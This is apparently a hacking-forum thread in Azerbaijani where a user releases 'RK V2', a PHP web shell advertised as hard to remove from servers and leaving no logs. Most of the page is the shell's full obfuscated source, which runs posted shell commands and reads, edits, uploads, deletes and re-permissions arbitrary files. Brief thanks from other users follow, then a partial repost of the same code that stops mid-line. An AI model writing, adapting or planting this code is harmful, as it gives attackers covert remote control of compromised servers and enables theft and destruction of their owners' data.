RK V2 - WebShell #webshell #bypassShell #AzeShell

ramil · 27 Noy 2023

Salam Hamıya
RK V2 hazırdır

ÖZƏLLİKLƏR:

1. C M D
2. Qovluq içi gəzmə
3. fayl qovluq baxmaq
4. Silmək - İcazələr - Redaktə et - Baxmaq - Son Dəyişiklik - Ölçü
5. Digər Shellərdən fərqi odur ki, serverlərdən silinmir

#webshell #bypassShell #AzeShell

not: kodlamada qətiyyən log yoxdur!!!

PHP:

<?php
goto IAH_A; qvgxc: $version = "\x32"; goto YiZET; OtRTt: echo "\x3c\164\x61\x62\x6c\x65\x20\x73\x74\x79\154\145\75\42\x77\151\x64\x74\x68\x3a\40\x37\x39\x25\x3b\42\76\74\x74\162\x3e\74\x74\x64\x3e"; goto S3xnm; Y_lnB: if ($action == "\x76\x77") { $path = ''; $file = ''; if (isset($_GET["\160\141\x74\x68"])) { $path = $_GET["\160\x61\164\x68"] . "\57"; } if (isset($_GET["\x66\x69\x6c\145"])) { $file = $_GET["\x66\151\x6c\145"]; } $source = file_get_contents($path . $file); echo "\104\151\162\145\143\164\x6f\x72\171\x20\x3a\x20\74\141\40\150\x72\x65\x66\75\77\160\141\164\x68\x3d{$path}\76{$path}\x3c\57\x61\x3e\40\xa"; echo "\x46\x69\154\x65\156\x61\155\x65\40\40\x3a\x20{$file}\x20\12"; echo "\106\165\154\x6c\160\141\164\x68\x20\x20\72\40{$path}{$file}\40\xa\12"; $source = str_replace("\x3c", "\46\154\164\x3b", $source); $source = str_replace("\76", "\x26\147\164\x3b", $source); echo $source; } goto iGNqy; vHeaE: ?>
<html><head><title>[RK v<?php  goto fYFxQ; l9eU1: if ($action == "\x64\164") { if (isset($_GET["\160\x61\164\x68"])) { if (isset($_GET["\x66\x69\154\x65"])) { unlink($_GET["\x70\141\x74\150"] . $_GET["\x66\151\x6c\x65"]); echo "\74\163\x63\x72\x69\160\x74\76\144\157\x63\x75\x6d\145\156\164\x2e\154\157\143\141\x74\x69\x6f\x6e\75\42\x3f\x70\141\164\x68\x3d" . addslashes($_GET["\160\141\164\150"]) . "\42\x3b\x3c\x2f\163\143\162\x69\x70\164\x3e"; } } } goto ESMp_; YiZET: if (isset($_POST["\165\160\x6c\157\157\144"])) { $uploaddir = $_POST["\x70\141\x74\x68"]; $uploadfile = $uploaddir . basename($_FILES["\x75\x73\145\x72\x66\x69\x6c\x65"]["\x6e\x61\155\145"]); if (isset($_FILES["\165\x73\145\x72\x66\x69\154\145"]["\156\x61\x6d\x65"])) { if (move_uploaded_file($_FILES["\x75\163\x65\162\x66\x69\154\x65"]["\x74\x6d\x70\x5f\x6e\141\155\145"], $uploadfile)) { echo "\74\x73\143\162\151\x70\164\x3e\144\x6f\x63\165\x6d\145\156\164\56\154\157\x63\x61\164\151\157\x6e\x3d\x27\x3f\x70\x61\x74\x68\75" . addslashes($uploaddir) . "\x27\x3c\x2f\163\143\x72\151\160\x74\76"; } else { echo "\x3c\163\x63\162\151\160\164\x3e\x64\x6f\x63\x75\155\x65\156\x74\x2e\154\x6f\143\x61\x74\151\157\156\75\x27\77\160\141\164\x68\75" . addslashes($uploaddir) . "\47\74\x2f\163\143\x72\x69\160\164\x3e"; } } } goto cwKdb; Y5Cfd: if (isset($_POST["\x63\x6f\x6d\x6d\141\156\144"])) { if (isset($_POST["\160\141\x74\x68"])) { $command = $_POST["\143\x6f\155\155\x61\156\144"]; $command = str_replace("\141\155\160\x3b", '', $command); $command = str_replace("\46\154\164\73", "\74", $command); $command = str_replace("\46\x67\x74\x3b", "\76", $command); $command = str_replace("\xa", '', $command); $path = $_POST["\160\x61\164\x68"]; $path = str_replace("\12", '', $path); echo shell_exec("\143\144\x20" . $path . "\x20\46\46\40" . $command . "\40\46\x26\40\x65\x63\x68\x6f\x20\122\x61\x6d\151\154\113\145\x6e\141\x6e\40\46\46\40" . $dd); die; } } goto vHeaE; QdWZp: ?>
]</title><meta charset="utf-8"><meta content="nofollow,noindex"name="robots"><link href="https://i.hizliresim.com/4ft8t6j.png"rel="shortcut icon"type="image/png"><link href="https://fonts.googleapis.com/css?family=Poppins"rel="stylesheet"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"rel="stylesheet"><style>body{background:url(https://i.hizliresim.com/hpahbnl.png) no-repeat center center fixed;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;background-blend-mode:screen;background-color:#000;color:#d3d3d3;font-family:Poppins;white-space:pre-wrap;cursor:url(https://cur.cursors-4u.net/cursors/cur-7/cur686.cur),progress!important}a:hover{cursor:url(https://cur.cursors-4u.net/cursors/cur-7/cur683.cur),progress!important}input,textarea{outline:0}pre{white-space:pre-wrap;margin:0;font-family:Poppins}table{white-space:pre-wrap;margin:0;border-style:none;font-family:Poppins}a{color:#d3d3d3}tr:hover{background-color:#111}input{color:#d3d3d3;background-color:#000;font-family:Poppins;border-style:none}img[id=logoRK]{float:left;animation:rotation 3s infinite linear}@keyframes rotation{90%{transform:rotateY(360deg)}}</style><style>body::-webkit-scrollbar{width:10px}body::-webkit-scrollbar-track{box-shadow:inset 0 0 5px #000}body::-webkit-scrollbar-thumb{background-color:#d3d3d3;outline:1px solid #000}</style></head><body onload="init()"><a href="?action=RKcmd">C M D</a> - <b><font color="Crimson"size="4">R</b>amil <b><font color="crimSon"size="4">K</b>enan v<?php  goto x960h; t8g2g: if ($action == "\x66\155") { $path = realpath(dirname(__FILE__)); if (isset($_GET["\x70\x61\164\x68"])) { $path = $_GET["\x70\141\164\150"]; } chdir($path); $path = realpath($path); $path = str_replace("\134", "\57", $path); $dirs = explode("\57", $path); $dirsc = count($dirs); echo "\x3c\x69\x20\x63\154\141\x73\x73\75\42\x66\141\x20\146\x61\x2d\162\x6f\141\144\42\76\x3c\57\x69\x3e\40\131\157\x6c\40\72\x20"; for ($i = 0; $i < $dirsc; $i++) { $hr .= $dirs[$i] . "\57"; echo "\x3c\141\40\150\162\x65\146\x3d\77\x70\141\x74\150\75{$hr}\x3e{$dirs[$i]}\x3c\x2f\x61\76\57"; } $iterator = new DirectoryIterator($path); echo "\74\x74\141\x62\154\145\40\x63\x6c\141\x73\x73\x3d\x22\x52\x4b\x63\x6f\x6c\157\162\x22\40\163\164\171\154\x65\x3d\42\167\x69\x64\164\x68\x3a\x20\x31\x30\x30\x25\73\x22\76"; echo "\74\x74\162\76\x3c\164\144\76\x41\144\x3c\57\x74\x64\x3e\74\x74\144\x3e\x42\x61\170\x6d\x61\161\40\40\40\40\40\74\x2f\164\144\x3e\x3c\x74\x64\76\122\145\144\x61\153\x74\311\231\x20\x65\164\40\40\40\40\40\x3c\57\164\x64\x3e\74\x74\x64\x3e\x53\151\154\x20\x20\40\40\x20\x3c\x2f\x74\144\76\74\164\x64\76\xc4\xb0\143\141\x7a\xc9\231\154\xc9\231\x72\40\x20\40\x20\40\74\57\x74\x64\x3e\74\x74\144\76\40\123\x6f\x6e\40\x44\311\x99\x79\151\xc5\x9f\x69\153\154\x69\153\74\57\164\x64\x3e\74\x74\x64\x3e\40\303\226\x6c\xc3\xa7\xc3\xbc\x20\74\x2f\x74\x64\76\x3c\x2f\164\162\76"; foreach ($iterator as $fileinfo) { if ($fileinfo->isDir()) { $octal_perms = substr(sprintf("\x25\157", $fileinfo->getPerms()), -4); echo "\x3c\x74\x72\76\74\x74\x64\76\x5b\x3c\x61\x20\x68\x72\145\146\x3d\42\77\x70\141\x74\x68\x3d" . $path . "\57" . $fileinfo->getFilename() . "\x22\76" . $fileinfo->getFilename() . "\x3c\x2f\x61\x3e\x5d\74\57\164\x64\76\x3c\x74\x64\x3e\x3c\x61\x20\150\162\x65\x66\75\42\x3f\x70\x61\164\150\x3d" . $path . "\57" . $fileinfo->getFilename() . "\x22\x3e\74\x69\x20\143\154\x61\163\163\x3d\42\x66\141\x20\x66\141\x2d\x65\171\145\42\x3e\74\x2f\141\76\74\x2f\x74\144\76\74\x74\x64\x3e\x3c\57\164\144\x3e\x3c\164\144\76\x3c\x61\40\x68\162\145\x66\75\x22\77\x61\143\x74\x69\x6f\x6e\75\x64\164\144\x26\160\141\164\x68\75" . $path . "\x2f\46\146\x69\x6c\145\x3d" . $fileinfo->getFilename() . "\42\x3e\74\151\40\143\154\x61\x73\x73\x3d\x22\146\x61\x20\x66\x61\x2d\x78\x69\x6e\147\x22\x3e\x3c\x2f\141\x3e\74\57\x74\x64\76\74\164\x64\76\x3c\163\160\x61\156\40\151\x64\75\42\160\x65\x72\x6d\x73\x22\x3e\74\141\x20\x68\x72\145\x66\75\152\x61\166\x61\163\143\x72\151\160\164\72\143\x68\x6d\157\144\x28\42" . $path . "\x2f" . $fileinfo->getFilename() . "\42\x29\76" . $octal_perms . "\74\57\141\x3e\x3c\x2f\x73\160\141\x6e\x3e\74\57\164\x64\76\74\x74\x64\x3e" . date("\x46\x20\144\40\131\40\x48\72\x69\x3a\163\x2e", filemtime($path . "\57" . $fileinfo->getFilename())) . "\74\57\164\144\x3e\x3c\164\x64\76\104\151\x72\x3c\x2f\x74\144\x3e\x3c\x2f\164\x72\76\12"; } } foreach ($iterator as $fileinfo) { if ($fileinfo->isFile()) { $octal_perms = substr(sprintf("\45\x6f", $fileinfo->getPerms()), -4); $msize = filesize($path . "\57" . $fileinfo->getFilename()); $msize = $msize / 1000; $size = "{$msize}"; $size = str_replace("\56", "\x2c", $size); $size = str_replace("\x30\54\x30", '', $size); $size = str_replace("\x30\54", '', $size); echo "\74\x74\162\76\74\164\x64\x3e\74\x61\40\150\162\145\x66\75\x22\x3f\x61\143\x74\151\x6f\x6e\x3d\166\167\x26\x70\141\x74\x68\x3d" . $path . "\x26\146\x69\x6c\x65\75" . $fileinfo->getFilename() . "\x22\x3e" . $fileinfo->getFilename() . "\74\57\x61\76\x3c\57\164\x64\x3e\74\164\144\x3e\74\141\x20\150\x72\145\146\75\42\x3f\141\x63\x74\x69\157\156\x3d\x76\x77\x26\160\x61\x74\150\75" . $path . "\x26\146\151\154\145\75" . $fileinfo->getFilename() . "\x22\x3e\74\x69\x20\x63\154\141\163\x73\x3d\42\x66\141\40\146\141\x2d\145\171\x65\x22\x3e\x3c\57\141\x3e\x3c\x2f\x74\144\76\x3c\164\x64\x3e\x3c\141\x20\x68\x72\145\146\75\x22\x3f\141\x63\x74\x69\x6f\156\x3d\145\x64\46\x70\x61\164\x68\75" . $path . "\x26\146\x69\x6c\x65\75" . $fileinfo->getFilename() . "\x22\76\74\151\40\143\x6c\x61\163\163\75\x22\146\141\40\x66\x61\55\160\145\156\143\151\x6c\42\76\74\x2f\x61\x3e\x3c\57\164\144\76\74\164\x64\76\74\141\x20\150\162\x65\x66\x3d\42\x3f\x61\143\x74\x69\x6f\156\75\x64\x74\46\x70\x61\164\x68\x3d" . $path . "\57\46\x66\151\x6c\145\75" . $fileinfo->getFilename() . "\x22\x3e\74\x69\x20\143\154\141\163\163\x3d\x22\x66\141\x20\x66\x61\55\x74\151\x6d\145\x73\x2d\x63\151\x72\143\154\145\42\76\x3c\x2f\141\76\x3c\x2f\164\144\x3e\x3c\164\144\x3e\74\163\160\x61\156\40\151\x64\x3d\42\160\x65\x72\x6d\x73\42\76\74\141\x20\150\162\145\x66\x3d\152\x61\x76\x61\163\143\162\x69\160\164\72\143\150\x6d\157\144\50\42" . $path . "\x2f" . $fileinfo->getFilename() . "\x22\x29\76" . $octal_perms . "\x3c\x2f\x61\76\x3c\57\x73\160\x61\x6e\x3e\74\x2f\164\x64\x3e\x3c\x74\144\x3e" . date("\x46\x20\x64\x20\131\x20\110\x3a\x69\x3a\x73\56", filemtime($path . "\x2f" . $fileinfo->getFilename())) . "\x3c\x2f\x74\144\76\74\164\144\x3e" . $size . "\40\x42\x79\164\145\163\74\57\164\x64\x3e\x3c\x2f\x74\162\x3e\xa"; } } echo "\74\x2f\164\x61\142\154\145\x3e"; ?>
<div align="center"border="0"style="position:fixed;width:100%;height:25px;z-index:0;top:250px;left:0"id="loading"valign="center"><div align="center"border="1"style="opacity:.7;width:110px;height:25px;z-index:1;border-collapse:collapse"><img id="logoRK"src="https://i.hizliresim.com/4ft8t6j.png"width="80vw"></div></div><script>var ld=document.all,ns4=document.layers,ns6=document.getElementById&&!document.all,ie4=document.all;function init(){ns4?ld.visibility="hidden":(ns6||ie4)&&(ld.display="none")}ns4?ld=document.loading:ns6?ld=document.getElementById("loading").style:ie4&&(ld=document.all.loading.style)</script><style>.RKcolor,.RKcolor tbody,.RKcolor tr{padding:0;border-collapse:collapse;margin:0;font-size:15px}.RKcolor{margin:10px 0}.RKcolor tbody tr:nth-child(2n){background:0 0}.RKcolor tbody tr:nth-child(2n+1){background:#000}.RKcolor tbody tr:hover{background:#8b0000}.RKcolor thead th{text-align:left}.RKcolor thead tr{background-color:#101010}.RKcolor{box-shadow:1px 10px 1px 1px #000}.RKcolor thead th{padding:4px 3px}</style><style>.social{text-align:center;padding-bottom:25px}.social>a{font-size:24px;width:40px;height:40px;display:inline-block;text-align:center;margin:0 8px;color:inherit;opacity:.75;text-decoration:none}.social>a:hover{opacity:.9}</style><div class="social"><a href="https://www.youtube.com/@difaiteam2214"class="fa fa-youtube"></a><a href="https://www.t.me/difaiteam"class="fa fa-telegram"></a><a href="https://www.instagram.com/difaiteam/"class="fa fa-instagram"></a><a href="https://twitter.com/DifaiTeam"class="fa fa-twitter"></a><a href="https://difai-team.org/"class="fa fa-internet-explorer"></a><br><b>RK</b> v<?php  echo $version; ?>
❤️ © <b>2023</b></div><?php  } goto Y_lnB; FhBNm: if (strtoupper(substr(PHP_OS, 0, 3)) === "\x57\111\x4e") { $oz = "\167\151\156"; } else { $oz = "\154\x69\156\165\170"; } goto eDtI2; mN878: echo "\123\145\162\166\145\x72\40\x20\x20\x20\40\x3a\40" . PHP_OS . "\x20\40\x20\x20\xa"; goto punMk; x960h: echo $version; goto s1bmf; TLmke: if ($action == "\122\113\x63\155\x64") { ?>
<div id="shell"></div><script>function line(t){null==t&&(t="/i/dont/know"),t=t,statement=t.replace(/\n/g,"")+'</font>><span id="command" onkeypress="runScript(event)"></span>',document.getElementById("shell").innerHTML+=statement,document.getElementById("command").contentEditable=!0,document.getElementById("command").focus()}function runScript(t){13==t.keyCode&&(exec(),document.getElementById("command").contentEditable=!1,document.getElementById("command").id="done",backup=path)}function exec(){command=document.getElementById("command").innerHTML,xmlhttp.open("POST",document.location,!0),xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded"),xmlhttp.send("command="+command.replace(/&/g,"%26")+"&path="+path.replace(/&/g,"%26")),xmlhttp.onreadystatechange=function(){4==xmlhttp.readyState&&200==xmlhttp.status&&(results=xmlhttp.responseText.replace("\n","").split(<?php  if ($os == 1) { echo "\42\122\141\x6d\x69\x6c\113\x65\x6e\141\x6e\40\x22"; } else { echo "\x22\x52\x61\x6d\x69\154\113\145\156\x61\x6e\x22"; } ?>
),path=results[1],result=results[0],result=result.replace(/&lt;/g,"<"),result=result.replace(/&gt;/g,">"),null==path&&(path=backup),statement="<pre>"+result+"</pre>",document.getElementById("shell").innerHTML+=statement,line(path))}}function start(){xmlhttp.open("POST",document.location,!0),xmlhttp.onreadystatechange=function(){4==xmlhttp.readyState&&200==xmlhttp.status&&(path=xmlhttp.responseText,line(path))},xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded"),xmlhttp.send("start=1")}window.XMLHttpRequest?xmlhttp=new XMLHttpRequest:xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"),start()</script><?php  } goto t8g2g; v2oIV: if (isset($_POST["\x73\x74\141\162\x74"])) { if ($os == 1) { $command = "\x63\x64"; } else { $command = "\x70\x77\144"; } $output = shell_exec($command); echo $output; die; } goto Y5Cfd; gG72o: if (isset($_POST["\x61\x63\164\151\x6f\x6e"])) { if (isset($_POST["\x70\141\164\150"])) { if (isset($_POST["\x6d\157\x64"])) { $mod = intval($_POST["\x6d\x6f\x64"], 8); chmod($_POST["\x70\x61\164\x68"], $mod); die; } } } goto FhBNm; punMk: echo "\x53\x65\162\x76\x65\162\x20\111\120\40\101\x64\144\x72\x65\x73\163\72\x20" . $_SERVER["\x53\x45\122\x56\x45\122\x5f\x41\x44\x44\x52"] . "\12"; goto XFUqL; fYFxQ: echo $version; goto QdWZp; SifmQ: if (isset($_GET["\141\x63\164\x69\157\156"])) { $action = $_GET["\x61\x63\164\x69\x6f\x6e"]; } goto l9eU1; eDtI2: $action = "\x66\155"; goto SifmQ; SXHXu: echo "\x3c\57\164\144\x3e\74\x2f\x74\x72\76\x3c\57\x74\141\142\154\145\x3e"; goto TLmke; S3xnm: echo "\x53\145\x72\x76\x65\162\x20\304\xb0\x73\164\x69\146\141\x64\311\231\303\247\151\163\x69\40\x20\x20\x3a\x20" . get_current_user() . "\40\x20\40\40\12"; goto mN878; ESMp_: if ($action == "\x66\x73") { $path = $_GET["\x70\141\x74\x68"]; $command = $_GET["\x63\x6d"]; $command = str_replace("\x61\155\x70\x3b", '', $command); $command = str_replace("\x26\x6c\x74\73", "\x3c", $command); $command = str_replace("\x26\x67\164\73", "\x3e", $command); $command = str_replace("\12", '', $command); $path = str_replace("\xa", '', $path); shell_exec("\143\144\x20" . $path . "\x20\46\x26\x20" . $command); echo "\x3c\x73\x63\x72\151\160\x74\x3e\144\x6f\x63\x75\155\145\156\164\x2e\154\x6f\143\x61\x74\151\157\156\x3d\42\77\x70\141\x74\150\75" . addslashes($_GET["\x70\x61\164\150"]) . "\x22\73\x3c\57\163\143\162\151\160\x74\x3e"; } goto nF9sf; nF9sf: if ($action == "\144\164\144") { if (isset($_GET["\160\141\x74\150"])) { if (isset($_GET["\x66\x69\154\145"])) { rmdir($_GET["\x70\x61\x74\150"] . $_GET["\146\151\x6c\145"]); echo "\x3c\163\x63\162\151\160\x74\x3e\144\x6f\x63\165\x6d\x65\156\x74\56\154\157\x63\141\164\151\x6f\156\x3d\42\x3f\160\141\164\150\x3d" . addslashes($_GET["\160\x61\x74\x68"]) . "\x22\x3b\74\57\x73\x63\162\151\160\164\x3e"; } } } goto uI9wB; XFUqL: echo "\x50\x72\157\161\x72\x61\155\40\x74\311\231\155\x69\x6e\x61\164\xc4\261\40\72\x20" . $_SERVER["\x53\105\122\126\105\122\x5f\x53\117\x46\x54\x57\101\122\105"] . "\xa"; goto SXHXu; IAH_A: error_reporting(0); goto qvgxc; uI9wB: if (strtoupper(substr(PHP_OS, 0, 3)) === "\127\x49\x4e") { $os = 1; $dd = "\143\144"; } else { $os = 2; $dd = "\160\x77\x64"; } goto v2oIV; s1bmf: ?>
<a href="?"><img id="logoRK"src="https://i.hizliresim.com/4ft8t6j.png"width="80vw"></a><?php  goto OtRTt; iGNqy: if ($action == "\145\144") { $path = ''; $file = ''; if (isset($_GET["\x70\x61\164\x68"])) { $path = $_GET["\160\141\x74\x68"] . "\x2f"; } if (isset($_GET["\146\151\154\145"])) { $file = $_GET["\x66\x69\x6c\145"]; } $source = file_get_contents($path . $file); echo "\x44\151\x72\145\x63\x74\x6f\x72\x79\x20\x3a\40\74\141\x20\x68\162\145\x66\75\x3f\x70\x61\x74\x68\75{$path}\76{$path}\x3c\x2f\x61\x3e\40\xa"; echo "\106\x69\x6c\145\x6e\141\x6d\145\x20\40\72\x20{$file}\x20\xa"; echo "\106\x75\154\154\x70\x61\x74\150\40\x20\x3a\40{$path}{$file}\40\12\xa"; $source = str_replace("\46\x6c\x74\x3b", "\x26\154\164\73", $source); $source = str_replace("\x26\147\164\x3b", "\46\147\x74\73", $source); $source = str_replace("\x26", "\46\141\155\160\x3b", $source); $source = str_replace("\x3c", "\46\154\x74\x3b", $source); $source = str_replace("\76", "\x26\x67\164\73", $source); $source = str_replace("\x26\147\x74\x3b", "\46\141\x6d\160\x3b\147\164\73", $source); $source = str_replace("\x26\154\164\73", "\46\141\x6d\x70\73\x6c\x74\73", $source); echo "\x3c\x66\x6f\x72\x6d\40\155\x65\164\x68\x6f\x64\x3d\x22\x70\157\163\x74\42\x20\x61\143\164\x69\157\156\75\x22\x6a\x61\166\141\x73\x63\x72\x69\160\164\x3a\145\144\x69\x74\x28\x29\x3b\x22\x3e\x3c\x69\x6e\x70\x75\x74\x20\164\x79\160\x65\x3d\x22\x68\x69\144\x64\x65\156\42\40\x69\144\75\x22\x70\x61\x74\150\x22\40\156\x61\x6d\145\x3d\x22\x70\141\164\x68\42\x20\166\x61\154\x75\145\x3d\42" . $path . $file . "\42\76\74\x73\160\141\156\40\x6e\x61\x6d\x65\x3d\42\163\x6f\x75\162\x63\145\x22\40\151\144\75\x22\163\157\x75\162\x63\145\x22\x20\143\157\x6e\164\x65\156\x74\x65\x64\x69\x74\x61\x62\154\145\75\42\x74\162\165\x65\x22\x3e" . $source . "\74\x2f\x73\160\141\x6e\76\74\x62\x72\76\x3c\x62\x72\76\x3c\142\x72\76\74\151\x6e\160\165\164\x20\164\x79\160\145\75\x22\163\x75\142\x6d\151\x74\42\x3e\x3c\x2f\146\x6f\162\x6d\x3e"; ?>
<script>function edit(){source=document.getElementById("source").innerHTML,source=source.replace(/&/g,"%26"),source=source.replace(/\+/g,"uiiplastzo"),xmlhttp.open("POST","?",!0),xmlhttp.onreadystatechange=function(){4==xmlhttp.readyState&&200==xmlhttp.status&&alert("Saved.")},xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded"),xmlhttp.send("source="+source+"&path="+document.getElementById("path").value+"&edit=1")}window.XMLHttpRequest?xmlhttp=new XMLHttpRequest:xmlhttp=new ActiveXObject("Microsoft.XMLHTTP")</script><?php  } goto tfkcp; cwKdb: if (isset($_POST["\x65\144\x69\164"])) { $source = $_POST["\163\x6f\165\162\143\145"]; $source = str_replace("\134\x27", "\47", $source); $source = str_replace("\x5c\134", "\134", $source); $source = str_replace("\134\42", "\x22", $source); $source = str_replace("\x26\154\x74\73", "\74", $source); $source = str_replace("\46\147\164\x3b", "\76", $source); $source = str_replace("\x26\x61\x6d\x70\x3b", "\46", $source); $source = str_replace("\165\151\151\x70\x6c\x61\163\x74\x7a\x6f", "\53", $source); $a = $source; echo $a; $myFile = $_POST["\x70\141\x74\x68"]; $fh = fopen($myFile, "\167") or die("\143\141\156\x27\x74\40\x6f\x70\x65\x6e\x20\146\x69\x6c\x65"); fwrite($fh, $a); fclose($fh); die; } goto gG72o; tfkcp: ?>
</body></html>

Kenan54 · 27 Noy 2023

Annihilator · 27 Noy 2023

Əlinizə saliq

DeusNosVidet<>z1 · 27 Noy 2023

elinize sağlık arkadaşlar

ramil · 27 Noy 2023

Salam Hamıya
RK V2 hazırdır

ÖZƏLLİKLƏR:

1. C M D
2. Qovluq içi gəzmə
3. fayl qovluq baxmaq
4. Silmək - İcazələr - Redaktə et - Baxmaq - Son Dəyişiklik - Ölçü
5. Digər Shellərdən fərqi odur ki, serverlərdən silinmir

#webshell #bypassShell #AzeShell

not: kodlamada qətiyyən log yoxdur!!!

PHP:

<?php
goto IAH_A; qvgxc: $version = "\x32"; goto YiZET; OtRTt: echo "\x3c\164\x61\x62\x6c\x65\x20\x73\x74\x79\154\145\75\42\x77\151\x64\x74\x68\x3a\40\x37\x39\x25\x3b\42\76\74\x74\162\x3e\74\x74\x64\x3e"; goto S3xnm; Y_lnB: if ($action == "\x76\x77") { $path = ''; $file = ''; if (isset($_GET["\160\141\x74\x68"])) { $path = $_GET["\160\x61\164\x68"] . "\57"; } if (isset($_GET["\x66\x69\x6c\145"])) { $file = $_GET["\x66\151\x6c\145"]; } $source = file_get_contents($path . $file); echo "\104\151\162\145\143\164\x6f\x72\171\x20\x3a\x20\74\141\40\150\x72\x65\x66\75\77\160\141\164\x68\x3d{$path}\76{$path}\x3c\57\x61\x3e\40\xa"; echo "\x46\x69\154\x65\156\x61\155\x65\40\40\x3a\x20{$file}\x20\12"; echo "\106\165\154\x6c\160\141\164\x68\x20\x20\72\40{$path}{$file}\40\xa\12"; $source = str_replace("\x3c", "\46\154\164\x3b", $source); $source = str_replace("\76", "\x26\147\164\x3b", $source); echo $source; } goto iGNqy; vHeaE: ?>
<html><head><title>[RK v<?php  goto fYFxQ; l9eU1: if ($action == "\x64\164") { if (isset($_GET["\160\x61\164\x68"])) { if (isset($_GET["\x66\x69\154\x65"])) { unlink($_GET["\x70\141\x74\150"] . $_GET["\x66\151\x6c\x65"]); echo "\74\163\x63\x72\x69\160\x74\76\144\157\x63\x75\x6d\145\156\164\x2e\154\157\143\141\x74\x69\x6f\x6e\75\42\x3f\x70\141\164\x68\x3d" . addslashes($_GET["\160\141\164\150"]) . "\42\x3b\x3c\x2f\163\143\162\x69\x70\164\x3e"; } } } goto ESMp_; YiZET: if (isset($_POST["\165\160\x6c\157\157\144"])) { $uploaddir = $_POST["\x70\141\x74\x68"]; $uploadfile = $uploaddir . basename($_FILES["\x75\x73\145\x72\x66\x69\x6c\x65"]["\x6e\x61\155\145"]); if (isset($_FILES["\165\x73\145\x72\x66\x69\154\145"]["\156\x61\x6d\x65"])) { if (move_uploaded_file($_FILES["\x75\163\x65\162\x66\x69\154\x65"]["\x74\x6d\x70\x5f\x6e\141\155\145"], $uploadfile)) { echo "\74\x73\143\162\151\x70\164\x3e\144\x6f\x63\165\x6d\145\156\164\56\154\157\x63\x61\164\151\157\x6e\x3d\x27\x3f\x70\x61\x74\x68\75" . addslashes($uploaddir) . "\x27\x3c\x2f\163\143\x72\151\160\x74\76"; } else { echo "\x3c\163\x63\162\151\160\164\x3e\x64\x6f\x63\x75\155\x65\156\x74\x2e\154\x6f\143\x61\x74\151\157\156\75\x27\77\160\141\164\x68\75" . addslashes($uploaddir) . "\47\74\x2f\163\143\x72\x69\160\164\x3e"; } } } goto cwKdb; Y5Cfd: if (isset($_POST["\x63\x6f\x6d\x6d\141\156\144"])) { if (isset($_POST["\160\141\x74\x68"])) { $command = $_POST["\143\x6f\155\155\x61\156\144"]; $command = str_replace("\141\155\160\x3b", '', $command); $command = str_replace("\46\154\164\73", "\74", $command); $command = str_replace("\46\x67\x74\x3b", "\76", $command); $command = str_replace("\xa", '', $command); $path = $_POST["\160\x61\164\x68"]; $path = str_replace("\12", '', $path); echo shell_exec("\143\144\x20" . $path . "\x20\46\46\40" . $command . "\40\46\x26\40\x65\x63\x68\x6f\x20\122\x61\x6d\151\154\113\145\x6e\141\x6e\40\46\46\40" . $dd); die; } } goto vHeaE; QdWZp: ?>
]</title><meta charset="utf-8"><meta content="nofollow,noindex"name="robots"><link href="https://i.hizliresim.com/4ft8t6j.png"rel="shortcut icon"type="image/png"><link href="https://fonts.googleapis.com/css?family=Poppins"rel="stylesheet"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"rel="stylesheet"><style>body{background:url(https://i.hizliresim.com/hpahbnl.png) no-repeat center center fixed;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;background-blend-mode:screen;background-color:#000;color:#d3d3d3;font-family:Poppins;white-space:pre-wrap;cursor:url(https://cur.cursors-4u.net/cursors/cur-7/cur686.cur),progress!important}a:hover{cursor:url(https://cur.cursors-4u.net/cursors/cur-7/cur683.cur),progress!important}input,textarea{outline:0}pre{white-space:pre-wrap;margin:0;font-family:Poppins}table{white-space:pre-wrap;margin:0;border-style:none;font-family:Poppins}a{color:#d3d3d3}tr:hover{background-color:#111}input{color:#d3d3d3;background-color:#000;font-family:Poppins;border-style:none}img[id=logoRK]{float:left;animation:rotation 3s infinite linear}@keyframes rotation{90%{transform:rotateY(360deg)}}</style><style>body::-webkit-scrollbar{width:10px}body::-webkit-scrollbar-track{box-shadow:inset 0 0 5px #000}body::-webkit-scrollbar-thumb{background-color:#d3d3d3;outline:1px solid #000}</style></head><body onload="init()"><a href="?action=RKcmd">C M D</a> - <b><font color="Crimson"size="4">R</b>amil <b><font color="crimSon"size="4">K</b>enan v<?php  goto x960h; t8g2g: if ($action == "\x66\155") { $path = realpath(dirname(__FILE__)); if (isset($_GET["\x70\x61\164\x68"])) { $path = $_GET["\x70\141\164\150"]; } chdir($path); $path = realpath($path); $path = str_replace("\134", "\57", $path); $dirs = explode("\57", $path); $dirsc = count($dirs); echo "\x3c\x69\x20\x63\154\141\x73\x73\75\42\x66\141\x20\146\x61\x2d\162\x6f\141\144\42\76\x3c\57\x69\x3e\40\131\157\x6c\40\72\x20"; for ($i = 0; $i < $dirsc; $i++) { $hr .= $dirs[$i] . "\57"; echo "\x3c\141\40\150\162\x65\146\x3d\77\x70\141\x74\150\75{$hr}\x3e{$dirs[$i]}\x3c\x2f\x61\76\57"; } $iterator = new DirectoryIterator($path); echo "\74\x74\141\x62\154\145\40\x63\x6c\141\x73\x73\x3d\x22\x52\x4b\x63\x6f\x6c\157\162\x22\40\163\164\171\154\x65\x3d\42\167\x69\x64\164\x68\x3a\x20\x31\x30\x30\x25\73\x22\76"; echo "\74\x74\162\76\x3c\164\144\76\x41\144\x3c\57\x74\x64\x3e\74\x74\144\x3e\x42\x61\170\x6d\x61\161\40\40\40\40\40\74\x2f\164\144\x3e\x3c\x74\x64\76\122\145\144\x61\153\x74\311\231\x20\x65\164\40\40\40\40\40\x3c\57\164\x64\x3e\74\x74\x64\x3e\x53\151\154\x20\x20\40\40\x20\x3c\x2f\x74\144\76\74\164\x64\76\xc4\xb0\143\141\x7a\xc9\231\154\xc9\231\x72\40\x20\40\x20\40\74\57\x74\x64\x3e\74\x74\144\76\40\123\x6f\x6e\40\x44\311\x99\x79\151\xc5\x9f\x69\153\154\x69\153\74\57\164\x64\x3e\74\x74\x64\x3e\40\303\226\x6c\xc3\xa7\xc3\xbc\x20\74\x2f\x74\x64\76\x3c\x2f\164\162\76"; foreach ($iterator as $fileinfo) { if ($fileinfo->isDir()) { $octal_perms = 